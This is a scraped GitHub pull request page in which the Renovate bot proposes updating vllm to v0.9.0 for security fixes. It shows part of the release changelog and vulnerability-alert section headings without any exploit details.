[CI/Build] Reorganize models tests by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17459
FIxing the AMD test failures caused by PR#16457 by @Alexei-V-Ivanov-AMD in https://github.com/vllm-project/vllm/pull/17511
[Build] Require setuptools >= 77.0.3 for PEP 639 by @russellb in https://github.com/vllm-project/vllm/pull/17389
[ROCm] Effort to reduce the number of environment variables in command line by @hongxiayang in https://github.com/vllm-project/vllm/pull/17229
[BugFix] fix speculative decoding memory leak when speculation is disabled by @noyoshi in https://github.com/vllm-project/vllm/pull/15506
[BugFix] Fix mla cpu - missing 3 required positional arguments by @LucasWilkinson in https://github.com/vllm-project/vllm/pull/17494
Avoid overwriting vllm_compile_cache.py by @youngkent in https://github.com/vllm-project/vllm/pull/17418
[Core] Enable IPv6 with vllm.utils.make_zmq_socket() by @russellb in https://github.com/vllm-project/vllm/pull/16506
[Misc] Optimize the Qwen3_ReasoningParser extract_reasoning_content by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17515
Improve configs - ObservabilityConfig by @hmellor in https://github.com/vllm-project/vllm/pull/17453
[Bugfix][Benchmarks] Allow benchmark of deepspeed-mii backend to select a model by @tishizaki in https://github.com/vllm-project/vllm/pull/17285
[Frontend] Show progress bar for adding requests by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17525
[Misc] Clean up test docstrings and names by [@DarkLight1337](https://r

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

Update dependency vllm to v0.9.0 [SECURITY]

dfe9935

renovate bot mentioned this pull request Jun 17, 2025

Update dependency openai to v1.99.6 #6

Open

1 task

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Update dependency vllm to v0.9.0 [SECURITY] #8

Update dependency vllm to v0.9.0 [SECURITY] #8

renovate bot commented May 28, 2025 •

edited

Loading

Uh oh!

Uh oh!

Update dependency vllm to v0.9.0 [SECURITY] #8

Are you sure you want to change the base?

Update dependency vllm to v0.9.0 [SECURITY] #8

Conversation

renovate bot commented May 28, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

Summary

Details

Impact

Fix

Summary

1. vllm/lora/utils.py Line 173

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

3. vllm/entrypoints/openai/serving_chat.py Line 351

4. benchmarks/benchmark_serving_structured_output.py Line 650

Fix

Description

Environment

Leakage

Results

Fixes

Summary

Details

Recommendation

Fixes

Summary

Details

PoC

Impact

Fix

Impact

Patches

Summary

Details

PoC

Impact

Fix

Release Notes

Highlights

Notable Changes

Model Enhancements

Performance, Production and Scaling

Security

Features

Hardwares

Documentation

Developer Facing

What's Changed

Configuration

Uh oh!

Uh oh!

renovate bot commented May 28, 2025 •

edited

Loading